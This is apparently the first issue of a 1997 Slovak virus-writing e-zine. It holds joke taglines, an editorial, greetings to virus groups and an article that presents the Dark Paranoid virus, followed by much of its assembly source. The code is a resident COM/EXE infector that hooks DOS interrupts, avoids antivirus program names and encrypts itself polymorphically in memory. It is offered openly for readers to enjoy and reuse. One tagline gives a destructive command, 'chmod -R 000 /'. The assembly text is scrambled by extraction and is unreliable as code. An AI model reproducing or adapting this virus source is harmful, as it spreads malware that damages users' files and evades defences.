pesimized for IE 800x600 hicolor © 1997 *-zine crew

Hardware-independent means it doesn't run on any computer.

This mail is delivered using 100% recyclable electrones.

Have you heard about new Microsoft's crystal ball? Anything you ask, it answers: "Not enought memory, add 20MB and try again" If god wanted human to work with computers, he'd equipe them with fast I/O ports

Quadrature of a circle? Phew! Try to install Windows95!

Sex is 1 of 9 reasons for reincarnation; the other 8 are unimportant.

When the lights are out, all woman are beautiful.

Virginity can be cured.

Your Hard Disc is dead, but Eddie lives!

Wanna keep your system ABSOLUTELY secured? Use: su -c "chmod -R 000 /"

File not found - Should I fake it?

What is this red button fowr9Y~~m NO CARRIER

How to double your disk drive space: Delete Windows.

Avoid hangovers: Stay drunken.

/etc/passwd: no such file or directory

Microsoft: brings power of yesterday to computers of today.

Life could be much easier if we have its source code.

#define QUESTION (2B || !2B)

// Shakespeare

This section is the finest spice which makes the mag much more tastier. We bring to you quality not the quantity. At least in this issue.

Dark Paranoid / Terror-6 Kyjacisko / Vyvojar One_Half.3577 / Vyvojar TMC:Level_6x9.A (Tiny Mutation Compiler) / Ender WordMacro.SlovakDictator / Nasty Lamer & Ugly Luser

From the top position of the Wild list comes famous One_Half.3577 by Vyvojar, . one of the best ever written viruses. We also present unusual virus Dark Paranoid by Terror-6, author with innovative ideas and very coolio style of coding. Ender, the TMC author didn't want to release full sources due his "love" to AVerz so we were at least allowed to publish description based on source code analyse and some sample of second generation. Blesk expemimented in the last time with the archive infection and we present the results of his research. Two really "lame" macrovirus authors - The Nasty Lamer and The Ugly Luser - wrote for our mag two nice macroviruses. That would be nothing special but those macroviruses are top elite. They have variable length, they are true polymorphic and the only one exemplar is detected by f-win. This is quit funny story. Some 10 dayz ago authors uploaded that one sample to cicatrix's site :) It is very crazy idea to detect this one macro by CRC (f-win suX) or am I not right dear Frisk???

At this time our Article section is only virus oriented (the rest of HPAV is omited right now), just because submissions we received are virus only. But in a future issues we promise to cover not only viruses. However who knows :-) So enjoy these articles, hope they 'll brigh some interesting infoz to you - there's rather lot's of stuff to read left, so go for 'em! Stealth / mgl Dark Avenger - the legend / mgl End of TBAV independence / mgl CPU opcodes / mgl RAR'n'ARJ dropper / blesk Story of one book / The Ziggy Zag Diary - Present future to forgotten past / The Unforgiven of Immortal Riot/Genesis

In this issue we have 4 interwiews. I think it is right enough for one isssue. But, actually we present in this first issue only the VX side of the biz. We've selected 4 interesting people, from 4 groups and two contiments. We hope, you'll enjoy all questions and answers. Stuff in brackets 're commnets by flush or mgl. .

Interview Interview Interview Interview

with CoKe of VLAD with WildW0rker of RSA with Sep of IRG with MrSandman of 29A

o, everything ends sometimes or somewhere. And you have, unfortunately, reached the end of our first issue. We hope, all you enjoyed the mag. To say the true, in some moments we lost hope the mag 'll be sometimes released. First we had viewer but not enough articles, then we obain high quality articles but found the viewer shitty... So we decided to use new mag engine, The CYBERAGE. After all the problems, the zine went out (uraaaaaaaaaaaaaaaaaaaaaaaaah!!!!). We know, our english is in some points quit buggy. We apologise :(((( But in the limited time we had for our work there was no oportunity to find some workaround. On the other hand, we brought to you in this issue tasty and cheesy high quality viruses and some other stuff. If you enjoyed the mag, please give us some form of feedback (look at "How to contact us" section). We need some moral support to keep us the engouraged for next issues. Do not forget, everyone has a share, everyone can contribute. flush + mgl

ear reader, please allow me to introduce the first (and i hope not the last at the same time) issue of our zine. I hope, everyone 'll find in this isssue at least two or three articles, which 'll be for him of some value.

e would like to focus our mag not only on virii, but also on the rest of the H/P/A/V. Ofcourse, we don't want to present only own stuff, every piece of your activity, dear reader, 'll be great. If you 're author of the ultimate, kick-the-ass virus or utility, or just want to tell your latest experiences or opinions to the rest of comunnity, contact us ! We would like to make your stuff public. emember, not everyone is virus&asm guru, so we 'll bring some stuff, which for some of you dudes, could be trivial or lame. But for someone it could be good example or ever the inspiration for own start as vx coder. ast but not the least, we 'll try to bring some interesting background stories and infos, some virus history related articles and more ...

hy this zine is named '*'? Well, we got several explanations. Just choose your favourite one. '*' in computer terms stands for wildcard - the sign that covers everything. '*', which ascii code is 42, was a international code for Slovakia, the origin of editors of this zine. However, nowadays we got a new dial-code 421 :( '*', the number of 42, is the answer to ultimate question of life, universe and everything.

iz little section is very important. If we forget to include you name, don't worry about it. We apologise for such a ommision, but on the other hand, who cares?

Personal greetings Virus section
Sep-IRG TuIRG QuantumG Ww0rker Mr.Sandman lDark Avenger lovinGOD Dark Angel yurik Tornado avd Ender Online Nasty Lamer & Ugly Luser _COKe_ Vyvojar Blesk - if we meet personally, we 'll land in next pub - thanx for your great contribution - your Unix page is gr8t - how do you feel as fresh married ? :-P - 29A - isn't it MiG some fighter ? - can i get some nukes ? And how was the stay on Hawai ? - long live the legend ! - it's really hard to meet you on #virus - was nice to meet you - nu, neudalos, poprobuem esco odin razik - are you alive ? - TMC is really kick the ass virus - awainting for your next virus - yu'v kewl style of coding - you kicked the fwin's ass :)))) - keep da VLAD alive !!! Und zum Wohl ! - how did you find us ??? - sorry for the viewer. But thiz1 is1ly real the best from all 'round the

world kdkd qark rebyc - 777 ! - thanx for sending me VLAD in the past - hope my mail 'll reach yer mbox. And be ready for the anti M$ stuff

Dark Paranoid
This is another elite contribution to our zine. So, after some time passed from release of this beautifull piece of code, we can present it to the virus comunity. I would like to express my unlimited thanx for allowing me to publish the source code to the author. Coder of Dark Paranoid, known under handle Terror-6, is one of the young Slovak programmers, who are countinuing the work of Vyvojar - to bring to the world new, never before seen viruses of the finest slovak quality. So far, according available information, Terror-6 is working on something, but no one knows, what it is. But we can hope, it will be some wild thing.

And now, let's talk about Dark Paranoid. This is very unusual com'n'exe com'n'exe file infecting resident virus. The approximate lenght of code, which is appended to target file is about 6 kB. When infecting com files, the Dark Paranoid 'll place own code to the start of file and the original contens of file 'll be moved behind the viral body. Exe's are infected as usual, the virus is appended to the end of file and the header 'll be manipulated to point to the virus. But what makes Dark Paranoid so unusual is its polymorphism. This virus is polymorphic even in the memory. In every moment, only one instruction from virus is unencrypted. After execution of this instruction occurs INT 1. Handler of INT 1 'll reencrypt executed instruction and decrypt next one. Decrypted instruciton 'll be execuded and excrypted again. And this is the princip of Dark Paranoid's "ENGINE OF ETERNAL ENCRYPTION". If you think, that INT 1 handler could be used as possible scanstring, you are so hopeless and crap ... .

When author spended such a amout of time and beer to code such a beutifull virus, and then he allow to catch it in memory with simple scanstring, he 'd be a big jerk. So, dear Averz and dear virus friends, handler is slightly polymorphic. On every instalation to the memory is this handler changed.

Virus avoids to infect files, which starts wiht 'AV', 'SC,' 'CL', 'GU', 'NO', 'FV', 'TO', 'TB'. In plain text, Dark Paranoid 'll not infect AVP, SCAN, CLEAN, GUARD, NOD (but ICE 'll be infected :(((( ), FINDVIRUS, TOOLKIT and TBAV. Dark Paranoid 'll also avoid to infect baits and goats.

Dark Paranoid contains payload - it prints on the screen text Dark Paranoid and shakes the screen.

Finally, all I have to say is - enjoy the code.

Download here


; compile to COM then run it. .MODEL tiny .CODE .186 begin: org 100h virlen heaplen datalen len_range d_len actionc MAXinst b_d len WRITE_LEN write_len_exe com_len REQUEST_MEM C_head ss_distance MAXCOM gb_len HEADERLEN decr_code vSP SS_to_CS TF start: old_enable: ENABLE: push push push popf equ equ equ equ equ equ equ equ equ equ equ equ equ equ equ equ equ equ equ equ equ equ (offset endv-offset begin) (offset heapend-offset heapbeg) (offset dataend-offset heapbeg) 1001 offset d_end-offset d_beg 4096 8 40h virlen+heaplen virlen+datalen virlen+(offset data_12e-offset heapbeg) write_len-100h (len)/16+1 offset C_aft-offset start 512 65535 offset gb_end-offset gb_mem 20h offset gb_mem-offset start 200h (write_len_exe+len_range)/16+1 300h

ds di 0

xor di,di mov ds,di e1: e2: mov di,cs:[engine__] xchg word ptr ds:[01*4],di mov word ptr cs:[old1],di mov di,cs xchg word ptr ds:[01*4+2],di mov word ptr cs:[old1+2],di pop di pop ds push push ent_: push eA: offset start_v TF cs


mov cs:[oldptr],offset rcpt iret old_engine:



pusha mov bp,sp push ds push cs pop ds e5: mov si,cs:[oldptr] ec_oldx: nop eng2: mov si,[bp+16] dc_oldx: nop e6: mov word ptr cs:[oldptr],si pop ds popa eng_iret: iret old_disable: DISABLE: push ds push di xor di,di mov ds,di e8: mov di,word ptr cs:[old1] mov ds:[4],di mov di,word ptr cs:[old1+2] mov ds:[6],di pop di pop ds Iret org 300h C_aft: gb_mem: old1 dd engine__ dw oldptr dw k1 dw ? k2 dw ? k3 dw ? gb_end: org 400h pred start_v:

? offset ENGINE ?

db MAXinst dup (?) nop push es push pop ds cs

jmp IDENTIFY action: mov mov mov mov mov mov mov mov mov mov mov

ax,0b800h ds,ax si,160*12+60 byte ptr [si],'D' byte ptr [si+2],'a' byte ptr [si+4],'R' byte ptr [si+6],'K' byte ptr [si+8],' ' byte ptr [si+10],'P' byte ptr [si+12],'A' byte ptr [si+14],'R'


mov mov mov mov mov

byte byte byte byte byte

ptr ptr ptr ptr ptr

[si+16],'a' [si+18],'N' [si+20],'O' [si+22],'i' [si+24],'D'

xor cx,cx ddd: push cx

mov ax,3 call random mov ah,80 mul ah mov bl,al mov ax,5 call random add al,80-2 add al,bl mov ah,al mov al,0dh mov dx,3d4h out dx,al xchg al,ah inc dx out dx,al mov dl,0b4h xchg ah,al out dx,al inc dx xchg ah,al out dx,al mov and or out dx,61h al,002h al,30h dx,al

pop cx dec cx jnz ddd retn

ALLOC: mov ah,50h mov bx,8 int 21h nop mov ah,48h mov bx,REQUEST_MEM int 21h nop pushf push ax mov bx,es mov ah,50h int 21h nop


pop ax popf retn ACCESS: mov ax,5800h int 21h nop mov [UMB_strategy],ax mov ax,5802h int 21h nop mov ah,0 mov [UMB_link],ax mov ax,5801h mov bx,0041h ; umb - best fit int 21h nop mov ax,5803h mov bx,1 int 21h nop retn

UNACCESS: push ax mov bx,[UMB_link] mov ax,5803h ; restore chain int 21h nop mov ax,5801h ; restore strategy mov bx,[UMB_strategy] int 21h nop pop ax retn gen_preint: mov ax,6 call random add al,0f8h mov byte ptr [INT_21],al retn IDENTIFY: mov ah,2ah int 21h nop call cr_data add cx,dx mov dx,cs INSTALL_TO_MEM: call ACCESS call ALLOC pushf call UNACCESS popf jnc mem_ok LOW_INSTALL: mov ax,4a00h+'¨' mov bx,-1 int 21h nop mov ah,4ah sub bx,REQUEST_MEM+1 int 21h nop


call ALLOC jnc mem_ok push es pop ds int 20h nop mem_ok: mov es,ax COPY: cld push cs pop ds xor si,si xor di,di mov cx,write_len/2+1 rep movsw

HIGHz: rl2:

push pop ds


mov ax,offset temp_int_21 mov di,word ptr [ent__] mov [di],ax ; entry point call init_random GET_VECTORZ: push 0 pop ds mov ax,ds:[4*21h] mov bx,ds:[4*21h+2] mov word ptr es:[old_21],ax mov word ptr es:[old_21+2],bx mov ax,cs:[bitch] mov word ptr ds:[4*21h],ax mov word ptr ds:[4*21h+2],es mov byte ptr es:[TEMP_INT_21],90h mov es,dx push cs pop ds call gen_preint ; don't think it ends so soon. ; so much things to do.

mov ah,4ch int 21h TEMP_INT_21: nop add sp,6

push ds push cs pop ds mov di,[old1_ofs] mov ax,word ptr es:[di] mov word ptr ds:[di],ax mov ax,word ptr es:[di+2] mov word ptr ds:[di+2],ax MAKE_HEAP: xor ax,ax


mov [create],ax mov ax,offset int_21 mov di,word ptr [ent__] mov [di],ax

push es pusha call morph push 0 pop ds mov ax,cs:[bitch] mov word ptr ds:[4*21h],ax popa pop es ds RETURN: mov ax,ss cmp ax,dx je COM_RETURN

EXE_RETURN: pop es mov cx,es add cx,10h mov bx,[old_ss] add bx,cx add [old_cs],cx mov ax,[old_sp] sub ax,sp mov ss,bx add sp,ax push push push 200h word ptr [old_cs] word ptr [old_ip]

call entry_regs jmp take_off_2 entry_regs: xor si,si xor di,di xor ax,ax xor bx,bx xor cx,cx xor dx,dx push es pop ds retn COM_RETURN: mov mov mov add cld rep

cx,[block_len] si,[block_beg] di,100h si,di movsb


pop es call


push 200h push es push 100h jmp take_off_2 TAKE_OFF_2: pusha push ds push cs pop ds mov al,byte ptr [dis_val] mov byte ptr [rcpt],al pop ds popa push push push push iret ena_pop: int_21: nop ah,5bh ; create new file crt ah,3ch v001 cmp cs:[create],0 jne jin call executable jnz JUMP_INT21 call hookold INT 21h ; come get some push ds push cs pop ds jc done mov [create],ax call rehook push si mov si,sp push ss pop ds push ax lahf mov [si+8],ah pop ax pop si pop ds jmp take_off_2 cmp je cmp jne crt: cmp ax,6c00h v002 dl,10h ok6c dl,12h JUMP_INT21 cs:[disable__] 0 cs offset rcpt

jin: cr_co:


v001: jne cmp je cmp jne



cmp cs:[create],0 jne JUMP_INT21 xchg si,dx call executable xchg si,dx jnz JUMP_INT21 test bl,2 jnz cr_co push ax cx push bx and bl,0fch inc bl inc bl call hookold INT 21h nop call rehook pop bx jnc cr_2 pop cx ax jmp JUMP_INT21 add sp,4 push ds push cs pop ds mov [create],ax jmp done cmp ah,3eh v003 cs:[create],bx v003 INFECT_ cmp ax,5800h ID_OK


v002: jne cmp jne jmp v003: je

JUMP_INT21: push 0 push word ptr cs:[old_21+2] push word ptr cs:[old_21] jmp TAKE_OFF_2


push ax ds es push 0 pop ds push cs pop es mov ax,word ptr cs:[old_21] xchg ax,ds:[21h*4] mov es:[hook21],ax mov ax,word ptr cs:[old_21+2] xchg ax,ds:[21h*4+2] mov es:[hook21+2],ax pop es ds ax retn push ax ds push 0 pop ds mov ax,cs:[hook21]



mov ds:[21h*4],ax mov ax,cs:[hook21+2] mov ds:[21h*4+2],ax pop ds ax retn


push push cs pop ds mov mov mov mov pop jmp

ax ds

ax,word ptr [safe] word ptr [rcpt],ax al,[safe+2] byte ptr [rcpt+2],al ds ax rcpt

ID_OK: push ax push dx cx call hookold mov ah,2ah int 21h nop call rehook mov ax,cx add ax,dx pop cx dx cmp ax,cx pop ax jne JUMP_INT21 add sp,8 jmp return EXECUTABLE: cld mov mov i002: cmp je cmp jne yepa: nopa: jnz mov mov and and cmp je cmp je cmp je cmp je cmp je cmp pusha si,dx bx,dx lodsb al,'\' yepa al,':' nopa mov bx,si or al,al i002 ax,[bx] bl,[bx+2] ax,0dfdfh bl,0dfh ax,'VA' ex_2 ax,'CS' ex_2 ax,'LC' ex_2 ax,'UG' ex_2 ax,'ON' ex_2 ax,'VF'

; AV[*] ; SCAN ; CLEAN ; GUARD (of eden ? ) ; NOD ? ; ???


je cmp je cmp je inc cmp jne mov sksm: cmp jne inc cmp jne mov skasm:

ex_2 ax,'OT' ex_2 ax,'BT' ex_2 al al,'Z'+1 sksm al,'A' al,ah namvspb ah ah,'Z'+1 skasm ah,'A'

; toolkit ; tbav

cmp bl,ah je ex_2 namvspb: mov mov or or cmp jne cmp je i003: ex_2: ex_en: ax,[si-3] bl,[si-4] ax,2020h bl,20h ax,'ex' i003 bl,'e' ex_en cmp ax,'mo' jne ex_en cmp bl,'c' popa retn jmp i_ec pusha push push call push pop es push pop ds


ds es hookold cs cs

i001: TIMESTAMP: mov ax,5700h INT 21H nop mov al,cl and al,1fh dec al jnz ts_1 jmp BAD_TIME ts_1: push cs pop ds mov [time],cx mov [date],dx READ_BUFFER: call seekstart mov dx,offset buffer mov cx,HEADERLEN


mov ah,3fh INT 21h nop jc i_error cmp ax,cx jne i_error call random0 mov byte ptr [int_21],al mov ax,len_range call random mov [len_add],ax mov ax,actionc call random cmp ax,111h jne noact pusha push ds call action pop ds popa noact: mov cmp je cmp jne e_i_2: isi: add add add add add ax,word ptr [buffer] ax,'MZ' E_I_2 ax,'ZM' COM_INFECT jmp EXE_INFECT push si [disable__],ax [ent__],ax [dc_old],ax [dco_end],ax [bitch],ax

mov si,[__old_1] add [si+4],ax pop si retn cni: jmp CAN_NOT_INFECT seekend

COM_INFECT: call or jnz cmp ja mov call

dx,dx CNI ax,maxCOM-COM_Len CNI [block_beg],ax seekstart

push bx call ACCESS mov ah,48h mov bx,(COM_len+d_len+1+len_range)/16 INT 21h pop bx jnc canal jmp CAN_NOT_ALLOCATE


canal: mov cx,COM_len add cx,[len_add] mov [temp_seg],ax mov ds,ax xor dx,dx mov ah,3fh INT 21h nop push cs pop ds mov [block_len],ax push ax call seekstart

mov si,[ent__] push [si] mov word ptr [si],offset start_v mov dx,[bitch] mov ax,100h sub ax,dx push ax call isi mov cx,C_head mov ah,40h call x_21 mov dx,offset C_aft mov cx,COM_len add cx,[len_add] cmp [block_beg],cx jae long_c mov [block_beg],cx long_c: sub cx,[len_add] sub cx,d_len+C_head mov ah,40h call cr_data call x_21 call cr_data add [len_add],d_len call write_add pop ax neg ax call


pop [si] call seekend pop cx xor dx,dx mov ds,[temp_seg] mov ah,40h INT 21h nop push pop es ds


mov ah,49h INT 21h nop push cs pop ds push cs pop es CAN_NOT_ALLOCATE: call UNACCESS CAN_NOT_INFECT: mov cx,[time] mov dx,[date] mov ax,5701h and cl,0e0h or cl,al INT 21h nop BAD_TIME: i_ec: mov [create],0 call rehook call gen_preint pop es pop ds popa jmp JUMP_INT21 Exe_Header EH_Signature EH_Modulo EH_Size EH_Reloc EH_Size_Header EH_Min_Mem EH_Max_Mem EH_SS EH_SP EH_Checksum EH_IP EH_CS eh_1st_reloc eh_ovl Exe_Header STRUC dw ? dw ? dw ? dw ? dw ? dw ? dw ? dw ? dw ? dw ? dw ? dw ? dw ? dw ? ENDS

; close

; Set to 'MZ' or 'ZM' for .exe files ; remainder of file size/512 ; file size/512 ; Number of relocation items ; Size of header in paragraphs ; Minimum paragraphs needed by file ; Maximum paragraphs needed by file ; Stack segment displacement ; Stack Pointer ; Checksum, not used ; Instruction Pointer of Exe file ; Code segment displacement of .exe ; first relocation item ; overlay number

EXE_INFECT: push cs pop es mov si,offset buffer+EH_SS cmp byte ptr [si+18h-EH_SS],40h je i_ec cmp word ptr [si+eh_ovl-EH_SS],0 ; no evrs. jne i_ec cmp byte ptr [si+eh_max_mem-EH_SS+1],7 jbe i_ec mov di,offset old_SS cld movsw movsw lodsw ; skip checksum movsw movsw


call seekend SET_EXE_HEAD: push ax dx mov cx,200h div cx dec ax cmp word ptr [buffer+EH_size],ax pop dx ax jb i_ec EI03: push ax dx and al,0fh jz no_add mov cx,10h sub cl,al mov ax,0b000h call random xchg dx,ax mov ah,40h INT 21h nop pop dx ax add ax,cx adc dx,0 jmp short yes_add pop dx ax push ax dx cx,16 cx dx,[bitch] word ptr [buffer+EH_IP],dx ax,word ptr [buffer+EH_Size_Header] word ptr [buffer+EH_CS],ax

no_add: yes_add: mov div mov mov sub mov

add ax,SS_to_CS mov word ptr [buffer+EH_SS],ax mov ax,900h call random add ah,2 mov al,0 mov word ptr [buffer+EH_SP],ax pop dx ax add adc add adc mov div mov or jz inc EI01: ax,[len_add] dx,0 ax,write_len_exe dx,0 cx,200h cx word ptr [buffer+EH_Modulo],dx dx,dx EI01 ax mov word ptr [buffer+EH_Size],ax mov si,[ent__] push [si] mov word ptr [si],offset start_v xor dx,dx mov cx,write_len_exe mov ah,40h


call cr_data call x_21 call cr_data pop [si] call write_add

jnc EI02 jmp CAN_NOT_INFECT EI02: call mov mov mov INT nop seekstart dx,offset buffer cx,headerlen ah,40h 21h

seekend: se_c:

jmp CAN_NOT_INFECT mov ax,4202h xor cx,cx xor dx,dx INT 21h retn

seekstart: mov ax,4200h jmp short se_c fake_seg: mov ax,0fa00h call random mov ds,ax mov al,byte ptr ds:[0] cmp al,byte ptr ds:[1] je fake_seg mov al,byte ptr ds:[len_range-6] cmp al,byte ptr ds:[len_range-8] je fake_seg retn write_add: call fake_seg mov cx,cs:[len_add] xor dx,dx mov ah,40h INT 21h nop push cs pop ds retn retn cr_ax equ offset cr_block+2

cr_randomize: mov di,offset cr_ax mov cx,6 cr_lop: movsw scasw scasb movsw scasw scasb


dec cx jnz cr_lop retn cr_data: push si mov si,offset heapbeg macro num db 81h,74h,&num,0,0 endm


cr_block: db 81h,34h,0,0 xorsi 2 xorsi 4 xorsi 6 xorsi 8 xorsi 10 xorsi xorsi xorsi xorsi xorsi xorsi pop si retn dil_ck: stosw xchg ax,bx stosw xchg ax,cx stosw xchg ax,dx stosw xchg ax,si stosw retn 12 14 16 18 20 22

; ????

dil_gen: mov di,offset getlost mov ax,08b2eh mov bx,0026h+256*(255 and (offset sp_tmp-offset begin)) mov cx,0bf00h+(offset sp_tmp-offset begin) shr 8 mov dx,offset rcpt mov si,0f78bh call dil_ck mov ax,0df8bh mov bx,04c6h mov cx,0ffc3h mov dx,0016h+256*(255 and (offset ec_new-offset begin)) mov si,8a00h+(offset ec_new-offset begin) shr 8 call dil_ck mov ax,0a204h mov bx,offset dis_val mov cx,05c7h mov dx,21cdh mov si,45c6h call dil_ck mov ax,0c302h mov bx,16ffh mov cx,offset ec_new


mov dx,368bh mov si,offset ecn_end call dil_ck mov ax,048fh mov bx,00beh+256*(255 and (offset new_enable-offset begin)) mov cx,8b00h+(offset new_enable-offset begin) shr 8 mov dx,0003eh+256*(255 and (offset bitch-offset begin)) mov si,0b900h+(offset bitch-offset begin) shr 8 call dil_ck mov ax,decr_code/2 mov bx,0a5f3h mov cx,0c033h mov dx,0c08eh mov si,368bh call dil_ck mov ax,offset m1 mov bx,8926h mov cx,0436h mov dx,8b00h mov si,00036h+256*(255 and (offset __old_1-offset begin)) call dil_ck mov ax,0c700h+(offset __old_1-offset begin) shr 8 mov bx,0644h mov cx,offset pred mov dx,00068h+256*(255 and TF) mov si,0e00h+(TF) shr 8 call dil_ck mov ax,00068h+256*(255 and (offset getlost_po-offset begin)) mov bx,02e00h+(offset getlost_po-offset begin) shr 8 mov cx,36ffh mov dx,offset m1 mov si,0c6c3h call dil_ck mov ax,0c304h mov bx,0c726h mov cx,0406h mov dx,0000h+256*(255 and (offset reCrypt-offset begin)) mov si,0c700h+(offset reCrypt-offset begin) shr 8 call dil_ck mov ax,0006h+256*(255 and (offset oldptr_2-offset begin)) mov bx,(offset oldptr_2-offset begin) shr 8+256*(255 and (offset pred+1-offset begin )) mov cx,05500h+(offset pred+1-offset begin) shr 8 mov dx,0ec8bh mov si,1f0eh call dil_ck mov ax,070eh mov bx,368bh mov cx,offset oldptr_2 mov dx,0fe8bh mov si,0de8bh call dil_ck mov ax,16ffh mov bx,offset ec_new mov cx,0fe81h mov dx,offset END_offset mov si,0372h call dil_ck mov ax,07be9h mov bx,2bffh mov cx,0276h mov dx,0def7h


mov si,0ce8bh call dil_ck mov ax,0e981h mov bx,0008h mov cx,0d9f7h mov dx,0c681h mov si,offset rcpt call dil_ck mov ax,7e8bh mov bx,0f302h mov cx,8ba4h mov dx,0276h mov si,000bfh+256*(255 and (offset rcpt-offset begin)) call dil_ck mov ax,0a500h+(offset rcpt-offset begin) shr 8 mov bx,0a5a5h mov cx,8ba5h mov dx,0276h mov si,0fe8bh call dil_ck mov ax,0de8bh mov bx,16ffh mov cx,offset dc_old mov dx,3689h mov si,offset oldptr_2 call dil_ck mov ax,048bh mov bx,0cd3ch mov cx,3a74h mov dx,0f3ch mov si,3774h call dil_ck mov ax,703ch mov bx,0472h mov cx,7f3ch mov dx,2f76h mov si,08e3dh call dil_ck mov ax,74d3h mov bx,3c28h mov cx,7461h mov dx,3d27h mov si,0f1f7h call dil_ck mov ax,2174h mov bx,0c33ch mov cx,1e74h mov dx,0ee3ch mov si,1a74h call dil_ck mov ax,0cf3ch mov bx,1574h mov cx,0eb3ch mov dx,1174h mov si,0e83ch call dil_ck mov ax,0c74h mov bx,0e93ch mov cx,0874h mov dx,0ff3dh mov si,74d0h call dil_ck


mov ax,0eb04h mov bx,460ah mov cx,4646h mov dx,8946h mov si,0276h call dil_ck mov ax,073e9h mov bx,33ffh mov cx,033f6h mov dx,033ffh mov si,0a1dbh call dil_ck mov ax,offset empty_seg mov bx,0d88eh mov cx,0c08eh mov dx,0c033h mov si,0cf5dh jmp dil_ck POWERUP: push cs pop es cld call fake_seg xor si,si mov di,offset new_enable mov cx,decr_code/2 rep movsw push cs pop ds

mov [__entry],offset int_21 mov ax,101h call random mov [bitch],ax add ax,offset old_enable-offset new_enable-100h mov [b2],ax

call random_g_mem mov [__old_1],ax add ax,4 mov [__engine],ax add ax,2 mov [__oldptr],ax add ax,2 mov [__ks],ax mov di,offset new_enable call gen_enable mov ax,b_d call random add di,ax mov [m1],di mov ax,[b2] add [m1],ax call push pop ds gen_engine cs


mov ax,b_d call random add di,ax mov ax,[b2] mov [disable__],di add [disable__],ax call gen_disable retn decision: push ax mov ax,2 call random pop ax retn random0: call random mov ax,cs:[rseed] retn

init_random: pusha push ds xor ax,ax mov ds,ax xor ax,ds:[046ch] xor ax,ds:[3456h] xor ax,ds:[7354h] pop ds mov word ptr [rseed],ax mov ah,2ah int 21h nop xor dx,ds:[046eh] xor dx,ds:[8*4+2] xor dx,ds:[2354h] mov word ptr [rseed+2],ax popa retn

random: push ds push cs pop ds mov word ptr [rtemp],ax push bx cx dx mov ax,word ptr [rseed] mov bx,word ptr [rseed+2] mov cx,ax mov dx,8405h mul dx shl cx,3 add ch,cl add dx,cx add dx,bx shl bx,2 add dx,bx add dh,bl shl bx,5 add dh,bl add ax,1


adc dx,0 mov word ptr [rseed],ax mov word ptr [rseed+2],dx mov cx,dx mul word ptr [rtemp] mov ax,cx mov cx,dx mul word ptr [rtemp] xchg ax,dx add dx,cx adc ax,0 pop dx cx bx ds or ax,ax retn CSs equ 0Eh DSs equ 1Eh ESs equ 06h SSs equ 16h t_mem equ 0 t_const equ 1 t_reg equ 2 t_stack equ 3 t_seg equ 4 random_grow equ 3 MK equ 0cccch mc_const struc mcc_type db db ? mcc_val dw mc_const ends

? ?

mc_mem struc mcm_type db ? mcm_seg db ? mcm_ofs dw ? mc_mem ends GET_TAB: push dx mov al,[si] mov dl,5 mul dl add al,[si+4] shl ax,2 add ax,offset cross_tab call ax or ax,ax pop dx retn COMPILER: comp_l: call GET_TAB je co_bad push si call ax pop si mov cmp jne cmp jne ax,[si+4] al,t_reg cll ah,[indy] cll


dec [lock_ind] cll: co_ok: add si,8 cmp byte ptr [si],0ffh jne comp_l retn


mov al,90h stosb jmp co_ok RECURSER: mov [si],ax mov [si+2],bx mov [si+4],cx mov [si+6],dx call ROOP add si,8 retn ROOP: call GET_TAB jz must_go mov ax,random_grow call random jnz roop_end must_go: mov ax,[si+4] mov [si+8+4],ax mov ax,[si+6] mov [si+8+6],ax ro_l: mov ax,4 call random mov [si+4],al cmp al,t_reg jne ro_lz cmp [lock_reg],0 je ro_l ro_lz: cmp al,t_stack jne ro_lx cmp word ptr [si],t_reg+4*256 je ro_l ro_lx: call GET_TAB jz ro_l mov al,[si+4] cmp al,t_mem je garbage_mem cmp al,t_reg je garbage_reg garbage_ret: mov [si+4],ax ; destination mov [si+6],bx mov [si+8],ax mov [si+10],bx add si,8 jmp ROOP roop_end: retn garbage_reg: mov ah,[use_reg] jmp garbage_ret garbage_mem: call random_g_mem mov bx,[__old_1] dec bx sub bx,ax ja gm_ok add bx,9


jns garbage_mem gm_ok: xchg ax,bx mov ax,CSs*256+t_mem jmp garbage_ret CROSS_TAB: mov ax,0 retn mov ax,0 retn mov ax,offset mem2reg retn mov ax,offset mem2stack retn mov ax,offset mem2seg retn mov ax,offset const2mem retn mov ax,0 retn mov ax,offset const2reg retn mov ax,0 retn mov ax,0 retn mov ax,offset reg2mem retn mov ax,0 retn mov ax,offset reg2reg retn mov ax,offset reg2stack retn mov ax,offset reg2seg retn mov ax,offset stack2mem retn mov ax,0 retn mov ax,offset stack2reg retn mov ax,0 retn mov ax,offset stack2seg retn mov ax,offset seg2mem retn mov ax,0 retn mov ax,offset seg2reg retn mov ax,offset seg2stack retn mov ax,0 retn mem2reg: mov al,[si].mcm_seg call drop_prefix mov al,8Bh ; mov reg16,[mem16] mov ah,[si+4+1] shl ah,3


jmp orah mem2stack: mov al,[si].mcm_seg call drop_prefix mov ax,30ffh ; push [mem16] jmp orah

mem2seg: mov al,[si].mcm_seg call drop_prefix mov al,08Eh ; mov seg,[mem16] mov ah,[si+4+1] sub ah,6 jmp orah const2mem: lodsw lodsw

; add si,4


mov al,[si].mcm_seg call drop_prefix mov ax,00c7h call orah mov ax,[si-4].mcc_val cmp ax,MK jne cm_ok mov [ent__],di mov ax,[b2] add [ent__],ax mov ax,[__entry] stosw retn

const2reg: mov al,[si+4+1] cmp [si].mcc_val,0 jne c2r2 mov dl,9 mul dl xchg ah,al call decision jz c2r3 or ax,0c033h ; xor reg,reg jmp c2rc c2r3: or ax,0c02bh ; sub reg,reg jmp c2rc c2r2: add al,0B8h ; mov reg16,imm16 stosb mov ax,[si].mcc_val stosw retn lodsw lodsw ; add si,4 mov al,[si].mcm_seg call drop_prefix mov al,89h ; mov [mem16],reg16 mov ah,[si-4+1] shl ah,3




jmp orah reg2reg: mov ah,[si+4+1] cmp ah,[si+1] je r2r_ shl ah,3 or ah,[si+1] or ah,0c0h mov al,8bh stosw retn


reg2stack: mov al,[si+1] add al,50h stosb retn reg2seg: mov al,08eh mov ah,[si+4+1] add ah,[si+1] add ah,0c0h-6 stosw retn

; push reg16

; mov seg,reg16


stack2mem: lodsw lodsw mov al,[si].mcm_seg call drop_prefix mov ax,008fh ; pop [mem16] jmp orah stack2reg: mov al,[si+4+1] add al,58h ; pop reg16 stosb retn stack2seg: mov al,[si+4+1] inc al stosb retn seg2mem: lodsw lodsw mov al,[si].mcm_seg call drop_prefix mov al,08ch ; mov seg,[mem16] mov ah,[si+1-4] sub ah,6 jmp orah

seg2reg: mov al,08ch mov ah,[si+1] add ah,[si+4+1] add ah,0c0h-6 stosw retn seg2stack: mov al,[si+1] ; mov seg,reg16


